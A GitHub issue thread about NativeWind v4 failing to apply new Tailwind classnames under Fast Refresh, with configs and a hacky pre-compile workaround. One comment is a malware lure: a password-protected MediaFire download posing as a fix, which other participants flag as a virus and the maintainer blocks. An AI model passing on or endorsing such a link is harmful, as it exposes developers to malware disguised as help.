### ISSUE TITLE
[V4] Poor dev experience when i have to keep resetting my app for using the first instance of any preset color/padding/ect...

### ISSUE THREAD

**Issue by ClickyCrispp** [nativewind/nativewind#1007]
**Describe the bug**
Having to re-compile every time I use a classname i haven't used before like color-red-500 or px-4
this is a brutal experience in development, defeats the purpose of fast refreshing your UI
 
Temporary solution: 
```
I added a gist below to fix this issue in most cases (I think)
Although it's very jank and you shouldn't ship this component in production, because it's a lot of unnecessary text
```
[Gist for hacky solution (massive tailwind classname string)](https://gist.github.com/ClickyCrispp/e702ef89bfa95731f10f9fae773ad67e)

**To Reproduce**
"react-native": "0.72.5",
"tailwind-merge": "^2.2.1",
"tailwindcss": "3.4.4",
"tailwindcss-animate": "^1.0.7",
"nativewind": "^4.1.1", //problem was happening on 4.0.63 as well

add px-4 or one of the colors that haven't been referenced before in the app, and it doesn't render with fast refresh
requires a reset to cache, and app

**Expected behavior**
While in dev these optimizations should be turned on, just compile all the styles in advance

**Additional context**
I was able to solve this problem somewhat with a hack, but it should just come this way by default
or by letting us enable it in settings

I do this to force compile these classes so i can properly develop, and just include this component at the top of my app
```
export function TWStyleCompiler() {
  if (__DEV__) return;

  return (
    <View>
      {/* padding components */}
      <View className="p-1 p-2 p-3 p-4 p-5 p-6 p-7 p-8 p-9 p-10" />
      <View className="px-1 px-2 px-3 px-4 px-5 px-6 px-7 px-8 px-9 px-10" />
      <View className="py-1 py-2 py-3 py-4 py-5 py-6 py-7 py-8 py-9 py-10" />
      <View className="pt-1 pt-2 pt-3 pt-4 pt-5 pt-6 pt-7 pt-8 pt-9 pt-10" />
     ...

      {/* margin components */}
      <View className="m-1 m-2 m-3 m-4 m-5 m-6 m-7 m-8 m-9 m-10" />
      <View className="mx-1 mx-2 mx-3 mx-4 mx-5 mx-6 mx-7 mx-8 mx-9 mx-10" />
      <View className="my-1 my-2 my-3 my-4 my-5 my-6 my-7 my-8 my-9 my-10" />
      <View className="mt-1 mt-2 mt-3 mt-4 mt-5 mt-6 mt-7 mt-8 mt-9 mt-10" />
     ...
      
     <Text className="text-black bg-black">text-black</Text>
      <Text className="text-white bg-white">text-white</Text>
    
    ...ect
 ```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ClickyCrispp** [comment]
So people are sharing viruses now of Github like this? Wtf

**Comment by ClickyCrispp** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

This is a virus if it wasn't obvious to people.. Crazy people are doing this on github

**Comment by marklawlor** [comment]
The described behaviour occurs when your app doesn't follow the rules of Fast Refresh. I would need to see a reproduction repo to determine if this is a big.

Thanks for the report, the account is blocked

**Comment by ClickyCrispp** [comment]
I'm not breaking any rules of fast refresh, I'm pretty confident in that.

It's happened every time I've tried to play with nativewind 4, with expo, without expo, and with various verions of 4.0.

I can give you my config though

```
const { hairlineWidth } = require('nativewind/theme');

/** @type {import('tailwindcss').Config} */
module.exports = {
  darkMode: 'class',
  content: ['./src/**/*.{ts,tsx}', './src/common/components/**/*.{ts,tsx}'],
  presets: [require('nativewind/preset')],
  theme: {
    extend: {
      colors: {
        border: 'hsl(var(--border))',
        input: 'hsl(var(--input))',
        ring: 'hsl(var(--ring))',
        background: 'hsl(var(--background))',
        foreground: 'hsl(var(--foreground))',
        primary: {
          DEFAULT: 'hsl(var(--primary))',
          foreground: 'hsl(var(--primary-foreground))',
        },
        secondary: {
          DEFAULT: 'hsl(var(--secondary))',
          foreground: 'hsl(var(--secondary-foreground))',
        },
        destructive: {
          DEFAULT: 'hsl(var(--destructive))',
          foreground: 'hsl(var(--destructive-foreground))',
        },
        muted: {
          DEFAULT: 'hsl(var(--muted))',
          foreground: 'hsl(var(--muted-foreground))',
        },
        accent: {
          DEFAULT: 'hsl(var(--accent))',
          foreground: 'hsl(var(--accent-foreground))',
        },
        popover: {
          DEFAULT: 'hsl(var(--popover))',
          foreground: 'hsl(var(--popover-foreground))',
        },
        card: {
          DEFAULT: 'hsl(var(--card))',
          foreground: 'hsl(var(--card-foreground))',
        },
      },
      borderWidth: {
        hairline: hairlineWidth(),
      },
      keyframes: {
        'accordion-down': {
          from: { height: '0' },
          to: { height: 'var(--radix-accordion-content-height)' },
        },
        'accordion-up': {
          from: { height: 'var(--radix-accordion-content-height)' },
          to: { height: '0' },
        },
      },
      animation: {
        'accordion-down': 'accordion-down 0.2s ease-out',
        'accordion-up': 'accordion-up 0.2s ease-out',
      },
    },
  },
  plugins: [require('tailwindcss-animate')],
};
```

pkg json
```
  "dependencies": {
    "@gorhom/bottom-sheet": "^4.6.1",
    "@react-native-async-storage/async-storage": "1.23.1",
    "@react-native-clipboard/clipboard": "^1.12.1",
    "@react-native-firebase/app": "^18.5.0",
    "@react-native-firebase/auth": "^18.5.0",
    "@react-native-google-signin/google-signin": "^10.0.1",
    "@react-navigation/bottom-tabs": "^6.5.12",
    "@react-navigation/native": "^6.1.10",
    "@react-navigation/native-stack": "^6.9.18",
    "@react-navigation/stack": "^6.3.21",
    "@sayem314/react-native-keep-awake": "^1.2.4",
    "@shopify/flash-list": "^1.6.3",
    "@tanstack/react-query": "^5.52.1",
    "axios": "^1.7.5",
    "class-variance-authority": "^0.7.0",
    "clsx": "^2.1.1",
    "color": "^4.2.3",
    "eventemitter3": "^5.0.1",
    "jotai": "^2.9.3",
    "lodash.chunk": "^4.2.0",
    "lodash.groupby": "^4.6.0",
    "lucide-react-native": "^0.424.0",
    "nativewind": "^4.1.1",
    "react": "18.2.0",
    "react-hook-form": "^7.46.2",
    "react-native": "0.72.5",
    "react-native-blob-util": "^0.19.10",
    "react-native-compressor": "^1.8.25",
    "react-native-config": "^1.5.1",
    "react-native-fs": "^2.20.0",
    "react-native-gesture-handler": "^2.14.0",
    "react-native-image-crop-picker": "^0.40.0",
    "react-native-keyboard-aware-scroll-view": "^0.9.5",
    "react-native-keyboard-controller": "^1.11.0",
    "react-native-permissions": "^3.9.2",
    "react-native-reanimated": "^3.6.2",
    "react-native-safe-area-context": "^4.9.0",
    "react-native-screens": "^3.29.0",
    "react-native-share-menu": "^6.0.0",
    "react-native-svg": "15.2.0",
    "react-native-vector-icons": "^9.2.0",
    "react-native-webview": "^13.6.0",
    "tailwind-merge": "^2.2.1",
    "tailwindcss": "3.4.4",
    "tailwindcss-animate": "^1.0.7",
    "typed-emitter": "^2.1.0",
    "zustand": "^4.5.5"
  }
  ```

**Comment by ClickyCrispp** [comment]
here is my jist with the hacky solution, in case it helps someone else in the future
assuming we can't fix it here

[Gist for hacky solution (massive tailwind classname string)](https://gist.github.com/ClickyCrispp/e702ef89bfa95731f10f9fae773ad67e.js)

**Comment by salomvary** [comment]
I'm facing the same problem on a newly started Expo project. The only way to force CSS to update is `rm -rf node_modules/.cache/nativewind` and then restarting the dev server.

I've checked if the problem occurs in the [example project](https://github.com/nativewind/nativewind/tree/next/examples/expo-router) bit there everything works as expected.

Weirdly enough, someone else working on the same code base does not have this problem. Seems like it will be hard to come up with a reproduction case...

**Comment by danstepanov** [comment]
Please provide a repro in v4.1
https://github.com/nativewind/nativewind/blob/next/contributing.md#opening-an-issue

**Comment by danstepanov** [comment]
closing until there's a proper repro
https://github.com/nativewind/nativewind/blob/main/contributing.md#opening-an-issue

**Comment by feierlaolao** [comment]
I'm facing the same problem on a newly started Expo project.

**Comment by lakardion** [comment]
I'm having the same issue. Whenever using a className that wasn't used before it would quickly refresh and drop any navigation state. So If I were in some deeply navigated screen, I would have to tap my way back to where I was devving.
